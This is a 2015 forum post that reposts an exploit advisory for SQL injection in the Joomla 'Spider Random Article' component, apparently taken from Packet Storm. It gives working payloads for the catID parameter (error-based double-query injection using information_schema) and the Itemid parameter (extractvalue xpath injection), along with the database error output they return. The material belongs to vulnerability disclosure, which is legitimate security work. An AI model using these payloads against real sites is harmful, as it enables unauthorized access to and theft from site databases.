KhiZaRix Posted March 25, 2015 Report Share Posted March 25, 2015 ###################################################################################################Exploit Title : Joomla Spider Random Article Component SQL Injection vulnerability#Author : Jagriti Sahu AKA Incredible#Vendor Link : Joomla Random Article Demo-Web Dorado#Date : 22/03/2015#Discovered at : IndiShell Lab#Love to : error1046 ,Team IndiShell,Codebreaker ICA ,Subhi,Mrudu,Hary,Kavi ##################################################################################################/////////////////////////// Overview:////////////////////////joomla component "Spider Random Article" is not filtering data in catID and Itemid parametersand hence affected by SQL injection vulnerability ///////////////////////////////// Vulnerability Description:///////////////////////////////vulnerability is due to catID and Itemid parameter /////////////////// POC ///////////////////SQL Injection in catID parameter=================================Use error based double query injection with catID parameterInjected Link--->Joomla Form Maker Demo-Web-DoradoLike error based double query injection for exploiting username --->Error: 500 View not found [name, type, prefix]: randomarticle, html, randomarticleView' and(select 1 FROM(select count(*),concat((select (select concat(database(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -&limit=1&style=1&view=articles&format=raw&Itemid=13 POC Image URL--->Image - TinyPic - Free Image Hosting, Photo Sharing & Video HostingSQL Injection in Itemid parameter=================================Itemid Parameter is exploitable using xpath injectionError: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '***%' OR items='all'' at line 1 SQL=SELECT * FROM vmvxw_spiderfacebook_params WHERE items LIKE '%***13' extractvalue(6678,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e ))-- -POC Image URL--->http://tinypic.com/view.php?pic=1239z5h&s=8#.VRG97OESHIU################################################################################################### --==[[special Thanks to]]==-- # Manish Kishan Tanwar #Source: http://dl.packetstormsecurity.net/1503-exploits/joomlasrac-sql.txt Quote Link to comment Share on other sites More sharing options...
.thumb.jpg.29b1f7ae7dd9ad5a11e41a710722ba35.jpg)